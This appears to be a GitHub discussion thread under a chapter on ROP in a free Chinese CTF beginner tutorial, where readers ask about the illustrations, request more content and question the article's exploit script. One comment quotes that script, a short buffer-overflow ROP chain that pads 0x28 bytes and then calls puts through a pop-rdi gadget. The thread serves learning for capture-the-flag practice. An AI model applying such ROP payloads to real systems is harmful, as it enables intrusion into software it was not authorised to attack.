HC_PWN/ROP/ #46
Replies: 5 comments 5 replies
-
您好,请问一下这种手绘风格的图片和动画是怎么做的呀,谢谢! |
Beta Was this translation helpful? Give feedback.
1 reply
-
您好,新手有一些不能理解的地方,Bing 后未果,恳请大佬指点:在文章最后给出的 exp 脚本中: puts_addr = elf.sym["puts"]
str_hello_world = 0x00402004
pop_rdi_ret = 0x0000000000401203
payload = b"A" * 0x28
payload += p64(pop_rdi_ret)
payload += p64(str_hello_world)
payload += p64(puts_addr)
|
Beta Was this translation helpful? Give feedback.
3 replies
-
这这这,期待大佬补全 |
Beta Was this translation helpful? Give feedback.
0 replies
-
Beta Was this translation helpful? Give feedback.
1 reply
-
邮件已收到,多谢。
|
Beta Was this translation helpful? Give feedback.
0 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
-
HC_PWN/ROP/
开源免费、新手友好的CTF(Capture The Flag,夺旗赛)入门教程
https://ctf.probius.xyz/HC_PWN/ROP/
Beta Was this translation helpful? Give feedback.
All reactions